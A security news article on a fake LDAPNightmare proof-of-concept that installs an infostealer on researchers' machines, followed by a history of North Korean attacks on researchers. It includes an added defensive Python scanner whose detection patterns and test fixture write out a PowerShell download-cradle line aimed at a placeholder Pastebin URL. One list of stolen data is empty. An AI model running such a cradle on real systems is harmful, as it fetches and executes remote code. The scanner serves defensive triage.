Security pros baited with fake Windows LDAP exploit traps

Tricky attackers trying yet again to deceive the good guys on home territory


Security researchers are once again being lured into traps by attackers, this time with fake exploits of serious Microsoft security flaws.

Trend Micro spotted what appears to be a fork of the legitimate LDAPNightmare proof-of-concept (PoC) exploit, first published by SafeBreach Labs on January 1. The "forked" PoC, however, leads to the download and execution of information-stealing malware.

LDAPNightmare is the name of the PoC for CVE-2024-49113, a 7.5-severity denial-of-service bug in LDAP patched in Microsoft's December Patch Tuesday.

It was one of two LDAP bugs – the other being the critical CVE-2024-49112 – addressed in Microsoft's final updates of 2024. Trend Micro researcher Sarah Pearl Camiling said that "both vulnerabilities were deemed as highly significant due to the widespread use of LDAP in Windows environments," and thus of keen interest to defenders.

In the counterfeit PoC, the legitimate version's Python files were replaced with an executable called "poc.exe." Running it drops a PowerShell script, which in turn downloads and executes a second script from Pastebin; that second stage collects various data points from the victim's machine.

The stolen data included:

Camiling noted that for experienced researchers, the bait scheme should have raised suspicions given that an executable was sitting inside a Python project. She didn't specify whether anyone had mistakenly fallen for it.
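A quick triage pass before running any cloned PoC would have caught this one. The script below is an added example, not code from the article, from Trend Micro, or from SafeBreach's LDAPNightmare PoC: it walks a checkout, flags PE executables by their MZ header rather than by extension (so a renamed binary is still caught), flags file types that have no business in a pure-Python project, and greps for PowerShell download-cradle indicators such as Pastebin URLs, `IEX`, `DownloadString` and `Invoke-WebRequest`. The indicator strings, the extension list, and the sample tree it builds (a fake `poc.exe` that is just an MZ header plus padding, and a stager pointing at a placeholder Pastebin URL) are all assumptions constructed for illustration, not artifacts from the real campaign.

```python
"""Triage a cloned proof-of-concept repository before running anything in it.

Added example; it is not code from the article, from Trend Micro, or from
SafeBreach's LDAPNightmare PoC. It flags the red flag the article mentions
(a PE executable inside a Python project) plus the stager behaviour it
describes (a PowerShell download cradle pulling a second stage from Pastebin).
The indicator strings are illustrative assumptions, not a vendor signature.
"""
import re
import tempfile
from pathlib import Path

PE_MAGIC = b"MZ"  # DOS/PE header; checked regardless of file extension

# File types that have no business in a pure-Python PoC (assumption).
UNEXPECTED_EXT = {".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".hta"}

# PowerShell download-cradle indicators (assumption: illustrative, not exhaustive).
CRADLE_PATTERNS = [
    re.compile(rb"pastebin\.com", re.IGNORECASE),
    re.compile(rb"Invoke-Expression|\bIEX\b", re.IGNORECASE),
    re.compile(rb"DownloadString|Invoke-WebRequest|Net\.WebClient", re.IGNORECASE),
    re.compile(rb"-EncodedCommand|\s-enc\s", re.IGNORECASE),
]


def scan_poc_dir(root):
    """Return a list of (relative_path, reason) findings, sorted by path."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        data = path.read_bytes()
        if data.startswith(PE_MAGIC):
            findings.append((rel, "PE executable (MZ header)"))
        if path.suffix.lower() in UNEXPECTED_EXT:
            findings.append((rel, f"unexpected {path.suffix.lower()} file in a Python project"))
        for pat in CRADLE_PATTERNS:
            if pat.search(data):
                findings.append((rel, "download-cradle indicator: " + pat.pattern.decode()))
    return findings


def looks_clean(root):
    """True only when the tree contains none of the indicators above."""
    return not scan_poc_dir(root)


def build_constructed_sample():
    """Create a throwaway tree that mimics the fake fork described above.

    Constructed sample, not the real malware: a benign Python helper, a
    'poc.exe' that is only an MZ header plus padding, and a dropped PowerShell
    stager that fetches a second stage from a placeholder Pastebin URL.
    """
    root = Path(tempfile.mkdtemp(prefix="poc-triage-"))
    (root / "ldap_client.py").write_text("import socket\n# legitimate-looking helper\n")
    (root / "poc.exe").write_bytes(PE_MAGIC + b"\x00" * 62)
    (root / "stage1.ps1").write_text(
        "IEX (New-Object Net.WebClient).DownloadString("
        "'https://pastebin.com/raw/PLACEHOLDER')\n"  # placeholder URL, not a real paste
    )
    return root


if __name__ == "__main__":
    sample = build_constructed_sample()
    for rel, reason in scan_poc_dir(sample):
        print(f"{rel}: {reason}")
    print("clean" if looks_clean(sample) else "DO NOT RUN: review findings above")
```

Run it against a real checkout with `scan_poc_dir("path/to/clone")`. The MZ check matters more than the extension list: an attacker can call the binary `poc.py.bak` or drop the extension entirely, but the header survives. A `git diff` against the upstream repository the fork claims to track is the other cheap check worth doing before anything is executed.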

"Although the tactic of using PoC lures as a vehicle for malware delivery is not new, this attack still poses significant concerns, especially since it capitalizes on a trending issue that could potentially affect a larger number of victims," she blogged.

CVE-2024-49112, the more severe of the two LDAP vulnerabilities patched in December, is a remote code execution flaw that received the highest severity score (9.8) in the 72-patch bundle, making it – and by association CVE-2024-49113 – the vulnerabilities of note for security pros and sysadmins.

It's the latest of many attempts to beat researchers at their own game. On multiple occasions, North Korean attackers have attempted to target security researchers using various tactics.

For example, Google's Threat Analysis Group (TAG) noted in a 2021 report that state-sponsored miscreants were even burning zero-days to break in and spy on those working on new vulnerabilities.

Rapid7 called it a "highly sophisticated attack" that followed others targeting experts at major vendors such as SonicWall, VMware, Mimecast, Malwarebytes, Microsoft, Crowdstrike, and SolarWinds.

One of the victims, Alejandro Caceres, founder of Hyperion Gray, told The Register about the "holy fuck" moment of realizing he'd been pwned by North Korea.

According to Caceres' account of the ordeal, someone using the name James Willy approached him on social media about working together on a zero-day vulnerability and only after submitting an analysis of it did he realize the Visual Studio project sent over was backdoored.

He said: "When I read the Google thing, I honestly think I said out loud 'holy fuck,' I thought it was insane. Attacked by a nation-state? Me!?"

Kim's cunning attackers were back at it in 2023 too, again using social media deception and burning zero-days in popular software to relay information about a target's PC back to home base.

They also hosted what seemed to be a legitimate Windows debugging tool on GitHub, which instead served as a vehicle for executing malicious code on unsuspecting users' machines. ®
